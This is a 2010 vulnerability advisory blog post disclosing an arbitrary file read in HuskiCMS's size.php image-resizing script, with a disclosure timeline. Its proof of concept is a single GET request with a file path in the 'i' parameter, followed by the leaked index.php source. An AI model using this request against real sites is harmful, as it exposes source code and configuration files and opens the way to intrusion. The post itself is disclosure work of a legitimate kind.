Just Another Hacker
Author's avatar

HuskiCSM local file read

HuskiCMS huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS [ Taken from: http://www.huskicms.com ]

Vulnerability description

A conditional file read exists in the image resizing script size.php’s i parameter. The parameter is not filtered and allows arbitrary files to be read.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: ASCET Interactive - http://www.ascetinteractive.com
  • Affected versions: Unknown

Proof of Concept

~$ GET 'http://[target]/size.php?i=index.php'
            <?php
                header ('Content-Type: text/html; charset=utf-8');
                // Data Includes
                include_once "PHPLib/db_mysql.inc";
                include_once "Data/dbConnection.class.php";
                include_once "Data/dbConfig.class.php";
                include_once "Data/dataAdapter.class.php";
                include_once "Quicksite/Core/domxml.class.php";
            
            
                // Quicksite Core Includes
                include_once "Quicksite/Core/all.inc.php";
                
                // Configuration
                include_once "Quicksite/db.config.php";
                include_once "inc/vars.config.php";
            
                // Initialise the Site
                $site = new Site($_VARS['site']);
                print_r($_SESSION['login']);
                // Initialise the Page
                $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));
            
                // Load plugin sources
                $page->loadPluginSources();
                
                // Create the Page
                $page->createPage();
                
                echo $page->Result;
            ?>

Solution

Upgrade to a more recent version

Disclosure time line

  • 05-Feb-2010 - Public disclosure
  • 29-Jan-2010 - Vendor acknowledge vulnerability
  • 28-Jan-2010 - Vendor notified through email

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.

More

All of the project information on one page!